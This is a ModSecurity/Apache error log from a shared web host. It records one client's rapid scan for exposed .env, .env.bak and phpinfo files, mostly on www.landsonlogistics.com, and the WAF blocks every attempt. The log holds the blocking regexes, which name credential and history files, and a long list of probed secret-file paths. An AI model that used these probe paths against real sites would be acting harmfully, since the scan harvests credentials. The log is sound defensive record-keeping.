[Tue May 26 14:49:08.792457 2026] [security2:error] [pid 648203:tid 648454] [client 195.178.110.199:60318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node-api/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjXgAAAP4"]
[Tue May 26 14:49:08.815394 2026] [security2:error] [pid 648203:tid 648407] [client 195.178.110.199:56234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node/.env"] [unique_id "ahVljLEQDDtxJNiDrdTjXwAAAM8"]
[Tue May 26 14:49:08.835089 2026] [security2:error] [pid 648203:tid 648368] [client 195.178.110.199:56192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/infophp.php"] [unique_id "ahVljLEQDDtxJNiDrdTjYQAAAKg"]
[Tue May 26 14:49:09.102531 2026] [security2:error] [pid 648203:tid 648430] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/nodeweb/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjaQAAAOY"]
[Tue May 26 14:49:09.178751 2026] [security2:error] [pid 648203:tid 648372] [client 195.178.110.199:56236] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/old/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjdQAAAKw"]
[Tue May 26 14:49:09.273417 2026] [security2:error] [pid 648203:tid 648348] [client 195.178.110.199:56144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/opt/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjegAAAJQ"]
[Tue May 26 14:49:09.575576 2026] [security2:error] [pid 648203:tid 648352] [client 195.178.110.199:56132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php.php"] [unique_id "ahVljbEQDDtxJNiDrdTjkAAAAJg"]
[Tue May 26 14:49:09.580801 2026] [security2:error] [pid 648203:tid 648421] [client 195.178.110.199:56204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php_info.php"] [unique_id "ahVljbEQDDtxJNiDrdTjkQAAAN0"]
[Tue May 26 14:49:09.651842 2026] [security2:error] [pid 648203:tid 648452] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/node/api/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjlQAAAPw"]
[Tue May 26 14:49:09.868098 2026] [security2:error] [pid 648203:tid 648454] [client 195.178.110.199:56218] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/php-info.php"] [unique_id "ahVljbEQDDtxJNiDrdTjqAAAAP4"]
[Tue May 26 14:49:09.928494 2026] [security2:error] [pid 648203:tid 648433] [client 45.3.38.118:63173] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVljLEQDDtxJNiDrdTjYAAAAOk"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:09.933586 2026] [security2:error] [pid 648203:tid 648368] [client 195.178.110.199:56236] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/prod/.env"] [unique_id "ahVljbEQDDtxJNiDrdTjqgAAAKg"]
[Tue May 26 14:49:10.000120 2026] [security2:error] [pid 648203:tid 648339] [client 195.178.110.199:60314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/phpinfo.php"] [unique_id "ahVljbEQDDtxJNiDrdTjrAAAAIs"]
[Tue May 26 14:49:10.017777 2026] [security2:error] [pid 648203:tid 648458] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/product/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjrwAAAQI"]
[Tue May 26 14:49:10.020429 2026] [security2:error] [pid 648203:tid 648443] [client 195.178.110.199:56196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/portal/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjsAAAAPM"]
[Tue May 26 14:49:10.223518 2026] [security2:error] [pid 648203:tid 648406] [client 195.178.110.199:56236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/public/phpinfo.php"] [unique_id "ahVljrEQDDtxJNiDrdTjuwAAAM4"]
[Tue May 26 14:49:10.252860 2026] [security2:error] [pid 648203:tid 648453] [client 195.178.110.199:56144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public_html/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjwAAAAP0"]
[Tue May 26 14:49:10.296249 2026] [security2:error] [pid 648203:tid 648456] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVljbEQDDtxJNiDrdTjpgAAAQA"]
[Tue May 26 14:49:10.302523 2026] [security2:error] [pid 648203:tid 648370] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/qa/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjxAAAAKo"]
[Tue May 26 14:49:10.308416 2026] [security2:error] [pid 648203:tid 648438] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/production/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjxQAAAO4"]
[Tue May 26 14:49:10.401028 2026] [security2:error] [pid 648203:tid 648460] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/project/.env"] [unique_id "ahVljrEQDDtxJNiDrdTjzAAAAQQ"]
[Tue May 26 14:49:10.465289 2026] [security2:error] [pid 648203:tid 648451] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public/.env"] [unique_id "ahVljrEQDDtxJNiDrdTj1QAAAPs"]
[Tue May 26 14:49:10.672793 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.5:56140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com.onesoft.in"] [uri "/config.php"] [unique_id "ahVljrEQDDtxJNiDrdTj4gAAAPc"]
[Tue May 26 14:49:10.689301 2026] [security2:error] [pid 648203:tid 648371] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/public-api/.env"] [unique_id "ahVljrEQDDtxJNiDrdTj4wAAAKs"]
[Tue May 26 14:49:11.088470 2026] [security2:error] [pid 648203:tid 648445] [client 195.178.110.199:56274] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/s3/.env.bak"] [unique_id "ahVlj7EQDDtxJNiDrdTkBgAAAPU"]
[Tue May 26 14:49:11.448220 2026] [security2:error] [pid 648203:tid 648399] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/.env"] [unique_id "ahVlj7EQDDtxJNiDrdTkHgAAAMc"]
[Tue May 26 14:49:12.079857 2026] [security2:error] [pid 648203:tid 648411] [client 104.167.19.199:31709] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVljrEQDDtxJNiDrdTkAgAAANM"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:12.702973 2026] [security2:error] [pid 648203:tid 648394] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlkLEQDDtxJNiDrdTkNwAAAMI"]
[Tue May 26 14:49:12.856025 2026] [security2:error] [pid 648203:tid 648419] [client 195.178.110.199:56234] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/api/.env"] [unique_id "ahVlkLEQDDtxJNiDrdTkSQAAANs"]
[Tue May 26 14:49:13.061655 2026] [security2:error] [pid 648203:tid 648344] [client 195.178.110.199:56144] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/server/backend/.env"] [unique_id "ahVlkbEQDDtxJNiDrdTkUQAAAJA"]
[Tue May 26 14:49:13.274372 2026] [security2:error] [pid 648203:tid 648449] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/service/.env"] [unique_id "ahVlkbEQDDtxJNiDrdTkWAAAAPk"]
[Tue May 26 14:49:13.419827 2026] [security2:error] [pid 648203:tid 648336] [client 195.178.110.199:56216] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/services/.env"] [unique_id "ahVlkbEQDDtxJNiDrdTkYQAAAIg"]
[Tue May 26 14:49:14.139325 2026] [security2:error] [pid 648203:tid 648402] [client 195.178.110.199:56276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/shared/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkeQAAAMo"]
[Tue May 26 14:49:14.164004 2026] [security2:error] [pid 648203:tid 648341] [client 195.178.110.199:60302] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/shop/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkegAAAI0"]
[Tue May 26 14:49:14.239018 2026] [security2:error] [pid 648203:tid 648409] [client 65.111.1.58:47431] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlkbEQDDtxJNiDrdTkVAAAANE"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:14.331989 2026] [security2:error] [pid 648203:tid 648412] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/src/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkgAAAANQ"]
[Tue May 26 14:49:14.472609 2026] [security2:error] [pid 648203:tid 648445] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/staging/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkhQAAAPU"]
[Tue May 26 14:49:14.618140 2026] [security2:error] [pid 648203:tid 648393] [client 195.178.110.199:56182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stg/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkkAAAAME"]
[Tue May 26 14:49:14.888603 2026] [security2:error] [pid 648203:tid 648362] [client 195.178.110.199:56164] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/srv/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTkmwAAAKI"]
[Tue May 26 14:49:14.895271 2026] [security2:error] [pid 648203:tid 648373] [client 195.178.110.199:56252] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/stage/.env"] [unique_id "ahVlkrEQDDtxJNiDrdTknAAAAK0"]
[Tue May 26 14:49:15.238915 2026] [autoindex:error] [pid 648203:tid 648420] [client 208.84.101.17:0] AH01276: Cannot serve directory /home1/taote1zo/public_html/mosykay.com/training/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:49:15.295720 2026] [security2:error] [pid 648203:tid 648408] [client 195.178.110.199:56260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.landsonlogistics.com"] [uri "/test.php"] [unique_id "ahVlk7EQDDtxJNiDrdTkwAAAANA"]
[Tue May 26 14:49:15.333879 2026] [security2:error] [pid 648203:tid 648374] [client 195.178.110.199:60462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/test/.env"] [unique_id "ahVlk7EQDDtxJNiDrdTkwQAAAK4"]
[Tue May 26 14:49:15.454190 2026] [security2:error] [pid 648203:tid 648359] [client 195.178.110.199:56162] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.landsonlogistics.com"] [uri "/user/.env"] [unique_id "ahVlk7EQDDtxJNiDrdTkyQAAAJ8"]
